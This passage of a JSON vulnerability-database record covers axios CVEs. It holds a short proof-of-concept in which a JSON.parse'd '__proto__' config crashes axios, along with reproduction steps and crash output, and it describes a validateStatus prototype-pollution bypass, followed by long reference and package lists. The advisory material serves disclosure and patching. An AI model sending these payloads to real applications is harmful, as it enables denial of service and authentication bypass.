(utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25639","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15623","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15752","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15795","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15798","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1578","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15744","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1582","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1594","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15888","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15802","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15889","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15927","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16003","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1595","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.16649","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25639"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"},{"reference_url":"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"},{"reference_url":"https://github.com/axios/axios/pull/7369","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/pull/7369"},{"reference_url":"https://github.com/axios/axios/pull/7388","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/pull/7388"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.0","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/axios/axios/releases/tag/v0.30.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.3","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.30.3"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.13.5","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.13.5"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25639","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25639"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907","reference_id":"1127907","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2438237","reference_id":"2438237","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2438237"},{"reference_url":"https://github.com/advisories/GHSA-43fc-jf86-j433","reference_id":"GHSA-43fc-jf86-j433","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10184","reference_id":"RHSA-2026:10184","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10184"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:11414","reference_id":"RHSA-2026:11414","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:11414"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13542","reference_id":"RHSA-2026:13542","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13542"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13548","reference_id":"RHSA-2026:13548","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2694","reference_id":"RHSA-2026:2694","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2694"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3087","reference_id":"RHSA-2026:3087","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3087"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3105","reference_id":"RHSA-2026:3105","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3105"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3106","reference_id":"RHSA-2026:3106","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3106"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3107","reference_id":"RHSA-2026:3107","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3107"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3109","reference_id":"RHSA-2026:3109","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3109"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:4942","reference_id":"RHSA-2026:4942","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:4942"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5142","reference_id":"RHSA-2026:5142","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5142"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5168","reference_id":"RHSA-2026:5168","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5168"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5174","reference_id":"RHSA-2026:5174","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5174"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5636","reference_id":"RHSA-2026:5636","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5636"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5665","reference_id":"RHSA-2026:5665","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5665"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:5807","reference_id":"RHSA-2026:5807","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:5807"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6170","reference_id":"RHSA-2026:6170","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6170"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6174","reference_id":"RHSA-2026:6174","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6174"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6192","reference_id":"RHSA-2026:6192","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6192"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6277","reference_id":"RHSA-2026:6277","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6277"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6308","reference_id":"RHSA-2026:6308","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6308"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6309","reference_id":"RHSA-2026:6309","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6309"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6404","reference_id":"RHSA-2026:6404","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6404"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6428","reference_id":"RHSA-2026:6428","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6428"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6497","reference_id":"RHSA-2026:6497","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6497"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6567","reference_id":"RHSA-2026:6567","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6567"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6568","reference_id":"RHSA-2026:6568","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6568"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6802","reference_id":"RHSA-2026:6802","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6802"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7249","reference_id":"RHSA-2026:7249","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7249"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8218","reference_id":"RHSA-2026:8218","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8218"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8229","reference_id":"RHSA-2026:8229","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8229"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8499","reference_id":"RHSA-2026:8499","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8499"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8500","reference_id":"RHSA-2026:8500","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8500"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8501","reference_id":"RHSA-2026:8501","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8501"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9848","reference_id":"RHSA-2026:9848","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9848"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-25639","GHSA-43fc-jf86-j433"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x41s-g5mh-pkdq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354422?format=json","vulnerability_id":"VCID-z6xx-7p9v-gqc6","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution to silently suppress all HTTP error responses (401, 403, 500, etc.), causing them to be treated as successful responses. This completely bypasses application-level authentication and error handling. The root cause is that validateStatus is the only config property using the mergeDirectKeys merge strategy, which uses JavaScript's in operator — an operator that inherently traverses the prototype chain. When Object.prototype.validateStatus is polluted with () => true, all HTTP status codes are accepted as success. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42041","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12226","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22152","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.24865","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42041"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461629","reference_id":"2461629","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461629"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42041","reference_id":"CVE-2026-42041","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42041"},{"reference_url":"https://github.com/advisories/GHSA-w9j2-pvgh-6h63","reference_id":"GHSA-w9j2-pvgh-6h63","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w9j2-pvgh-6h63"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63","reference_id":"GHSA-w9j2-pvgh-6h63","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:29:47Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42041","GHSA-w9j2-pvgh-6h63"],"risk_score":2.1,"exploitability":"0.5","weighted_severity":"4.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z6xx-7p9v-gqc6"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/96327?format=json","vulnerability_id":"VCID-1vkx-cwua-rqe4","summary":"In axios before 1.7.8, lib/helpers/isURLSameOrigin.js does not use a URL object when determining an origin, and has a potentially unwanted setAttribute('href',href) call. NOTE: some parties feel that the code change only addresses a warning message from a SAST tool and does not fix a vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-57965","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25107","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.24929","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2505","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25096","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28445","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28577","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28379","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28487","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.2849","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28447","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28398","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28414","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28392","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28339","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28534","published_at":"2026-04-02T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-57965"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57965","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57965"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios/commit/0a8d6e19da5b9899a2abafaaa06a75ee548597db","reference_id":"0a8d6e19da5b9899a2abafaaa06a75ee548597db","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/commit/0a8d6e19da5b9899a2abafaaa06a75ee548597db"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1094731","reference_id":"1094731","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1094731"},{"reference_url":"https://github.com/axios/axios/issues/6351","reference_id":"6351","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/issues/6351"},{"reference_url":"https://github.com/axios/axios/pull/6714","reference_id":"6714","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/pull/6714"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.7.8","reference_id":"v1.7.8","reference_type":"","scores":[{"value":"0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-29T14:14:16Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.7.8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932089?format=json","purl":"pkg:deb/debian/node-axios@1.7.9%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.7.9%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID